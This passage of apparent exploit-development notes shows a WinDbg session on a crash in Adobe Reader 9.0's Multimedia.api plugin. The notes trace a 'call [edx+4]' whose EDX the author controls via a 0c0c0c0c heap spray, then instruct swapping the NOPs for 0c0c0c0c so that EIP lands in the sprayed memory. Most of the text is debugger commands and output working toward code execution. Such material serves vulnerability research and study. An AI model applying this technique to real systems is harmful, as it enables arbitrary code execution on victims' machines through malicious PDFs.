3522
0013fff0 00000000 kernel32!BaseProcessStart+0x23
3523
3524
2d843117 -- the return address that we would have returned to, if we didnt crash.
3525
address 2d843117-2 we will have a CALL instruction.
3526
3527
u 2d843117
3528
u 2d843117-2
3529
u 2d843117-3 <---- we found the CALL instruction - call [edx+4]
3530
u 2d843117-4
3531
3532
0:000> u 2d843117-3
3533
Multimedia!PlugInMain+0x41b66:
3534
2d843114 ff5204          call    dword ptr [edx+4] <---- the culprit!!!
3535
2d843117 6a00            push    0
3536
2d843119 68d8b68c2d      push    offset Multimedia!PlugInMain+0xca12a (2d8cb6d8)
3537
2d84311e 56              push    esi
3538
2d84311f e842aefdff      call    Multimedia!PlugInMain+0x1c9b8 (2d81df66)
3539
2d843124 83c40c          add     esp,0Ch
3540
2d843127 66b80100        mov     ax,1
3541
2d84312b 5e              pop     esi
3542
3543
We control EDX
3544
edx=0c0c0c0c
3545
3546
call [edx+4] = call [0c0c0c10]
3547
dd edx+4
3548
3549
0:000> dd edx+4
3550
0c0c0c10  90909090 90909090 90909090 90909090
3551
0c0c0c20  90909090 90909090 90909090 90909090
3552
3553
0:000> u 2d843117-7
3554
Multimedia!PlugInMain+0x41b62:
3555
2d843110 8b10            mov     edx,dword ptr [eax]
3556
2d843112 8bc8            mov     ecx,eax
3557
2d843114 ff5204          call    dword ptr [edx+4]
3558
3559
dd eax
3560
3561
0:000> dd eax
3562
02e2d680  0c0c0c0c 0c0c0c0c 0c0c0c0c 0c0c0c0c
3563
02e2d690  42424242 42424242 42424242 42424242
3564
02e2d6a0  42424242 42424242 42424242 42424242
3565
02e2d6b0  42424242 42424242 42424242 42424242
3566
02e2d6c0  42424242 42424242 00000000 00000000
3567
3568
mnp3.pdf
3569
3570
change the NOPs 90909090 to 0c0c0c0c
3571
3572
mov edx, [eax]
3573
call [edx+4]
3574
3575
edx = 0c0c0c0c
3576
edx+4 = 0c0c0c10
3577
contents at edx+4 will also be "0c0c0c0c"
3578
3579
EIP will jump to 0c0c0c0c
3580
3581
and...
3582
3583
0:000> u 0c0c0c0c
3584
*** WARNING: Unable to verify checksum for C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Multimedia.api
3585
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Multimedia.api - 
3586
0c0c0c0c 0c0c            or      al,0Ch
3587
0c0c0c0e 0c0c            or      al,0Ch
3588
0c0c0c10 0c0c            or      al,0Ch
3589
0c0c0c12 0c0c            or      al,0Ch
3590
0c0c0c14 0c0c            or      al,0Ch